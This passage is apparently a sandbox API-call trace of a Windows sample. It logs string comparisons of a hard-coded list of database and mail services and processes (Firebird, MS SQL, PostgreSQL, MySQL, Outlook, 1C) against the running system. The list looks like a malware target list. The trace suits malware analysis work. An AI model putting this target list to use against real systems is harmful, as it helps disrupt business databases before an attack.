lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0053.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0053.895] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0053.895] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0053.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0053.895] lstrlenW (lpString="Netman") returned 6 [0053.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0053.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0053.895] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0053.895] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0053.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0053.895] lstrlenW (lpString="netprofm") returned 8 [0053.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0053.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0053.895] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0053.895] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0053.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0053.895] lstrlenW (lpString="NlaSvc") returned 6 [0053.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0053.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0053.895] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0053.895] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0053.895] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0053.895] lstrlenW (lpString="nsi") returned 3 [0053.895] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0053.895] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0053.896] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0053.896] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0053.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0053.896] lstrlenW (lpString="PcaSvc") returned 6 [0053.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0053.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0053.896] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0053.896] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0053.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0053.896] lstrlenW (lpString="PlugPlay") returned 8 [0053.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0053.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0053.896] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0053.896] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0053.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0053.896] lstrlenW (lpString="Power") returned 5 [0053.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0053.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0053.896] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0053.896] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0053.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0053.896] lstrlenW (lpString="ProfSvc") returned 7 [0053.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0053.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0053.896] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0053.896] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0053.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0053.896] lstrlenW (lpString="RpcEptMapper") returned 12 [0053.896] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.896] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0053.896] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0053.896] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0053.896] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0053.896] lstrlenW (lpString="RpcSs") returned 5 [0053.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0053.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0053.897] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0053.897] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0053.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0053.897] lstrlenW (lpString="SamSs") returned 5 [0053.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0053.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0053.897] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0053.897] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0053.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0053.897] lstrlenW (lpString="Schedule") returned 8 [0053.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0053.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0053.897] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0053.897] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0053.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0053.897] lstrlenW (lpString="SENS") returned 4 [0053.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0053.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0053.897] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0053.897] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0053.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0053.897] lstrlenW (lpString="ShellHWDetection") returned 16 [0053.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.897] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0053.897] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0053.897] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0053.897] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0053.897] lstrlenW (lpString="Spooler") returned 7 [0053.897] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0053.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0053.898] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0053.898] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0053.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0053.898] lstrlenW (lpString="swprv") returned 5 [0053.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0053.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0053.898] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0053.898] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0053.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0053.898] lstrlenW (lpString="SysMain") returned 7 [0053.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0053.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0053.898] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0053.898] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0053.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0053.898] lstrlenW (lpString="Themes") returned 6 [0053.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0053.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0053.898] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0053.898] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0053.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0053.898] lstrlenW (lpString="TrkWks") returned 6 [0053.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0053.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0053.898] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0053.898] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0053.898] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0053.898] lstrlenW (lpString="UxSms") returned 5 [0053.898] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0053.898] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0053.898] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0053.899] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0053.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0053.899] lstrlenW (lpString="VSS") returned 3 [0053.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0053.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0053.899] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0053.899] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0053.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0053.899] lstrlenW (lpString="WdiServiceHost") returned 14 [0053.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0053.899] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0053.899] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0053.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0053.899] lstrlenW (lpString="WdiSystemHost") returned 13 [0053.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0053.899] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0053.899] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0053.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0053.899] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0053.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0053.899] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0053.899] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0053.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0053.899] lstrlenW (lpString="Winmgmt") returned 7 [0053.899] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0053.899] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0053.899] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0053.899] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0053.899] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0053.899] lstrlenW (lpString="WPDBusEnum") returned 10 [0053.900] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.900] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0053.900] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0053.900] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0053.900] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0053.900] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6c08c8 | out: hHeap=0x5d0000) returned 1 [0053.900] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0053.902] Process32FirstW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0053.902] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0053.903] lstrlenW (lpString="System") returned 6 [0053.903] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0053.903] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0053.903] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0053.903] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0053.903] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0053.903] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0053.903] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0053.903] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0053.904] lstrlenW (lpString="smss.exe") returned 8 [0053.904] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0053.904] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0053.904] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0053.904] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0053.904] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0053.904] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0053.904] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0053.904] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.905] lstrlenW (lpString="csrss.exe") returned 9 [0053.905] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0053.905] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0053.905] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0053.905] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0053.905] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0053.905] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0053.905] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0053.905] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0053.906] lstrlenW (lpString="wininit.exe") returned 11 [0053.906] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0053.906] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0053.906] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0053.906] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0053.906] lstrlenW (lpString="csrss.exe") returned 9 [0053.906] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0053.907] lstrlenW (lpString="winlogon.exe") returned 12 [0053.907] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0053.908] lstrlenW (lpString="services.exe") returned 12 [0053.908] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0053.908] lstrlenW (lpString="lsass.exe") returned 9 [0053.908] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0053.909] lstrlenW (lpString="lsm.exe") returned 7 [0053.909] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.910] lstrlenW (lpString="svchost.exe") returned 11 [0053.910] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.910] lstrlenW (lpString="svchost.exe") returned 11 [0053.911] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.911] lstrlenW (lpString="svchost.exe") returned 11 [0053.911] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.912] lstrlenW (lpString="svchost.exe") returned 11 [0053.912] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.913] lstrlenW (lpString="svchost.exe") returned 11 [0053.913] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0053.913] lstrlenW (lpString="audiodg.exe") returned 11 [0053.914] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.914] lstrlenW (lpString="svchost.exe") returned 11 [0053.914] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.915] lstrlenW (lpString="svchost.exe") returned 11 [0053.915] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0053.916] lstrlenW (lpString="dwm.exe") returned 7 [0053.916] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0053.916] lstrlenW (lpString="explorer.exe") returned 12 [0053.916] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0053.917] lstrlenW (lpString="spoolsv.exe") returned 11 [0053.917] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.918] lstrlenW (lpString="taskhost.exe") returned 12 [0053.918] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.919] lstrlenW (lpString="svchost.exe") returned 11 [0053.919] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0053.919] lstrlenW (lpString="taskeng.exe") returned 11 [0053.919] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0053.920] lstrlenW (lpString="taskhost.exe") returned 12 [0053.920] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0053.921] lstrlenW (lpString="carried trinity.exe") returned 19 [0053.921] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0053.921] lstrlenW (lpString="heaven.exe") returned 10 [0053.921] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0053.922] lstrlenW (lpString="dell.exe") returned 8 [0053.922] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0053.923] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0053.923] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0053.924] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0053.924] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0053.924] lstrlenW (lpString="til ear equal.exe") returned 17 [0053.924] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0053.925] lstrlenW (lpString="itunes-bring.exe") returned 16 [0053.925] Process32NextW (in: hSnapshot=0x208, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, 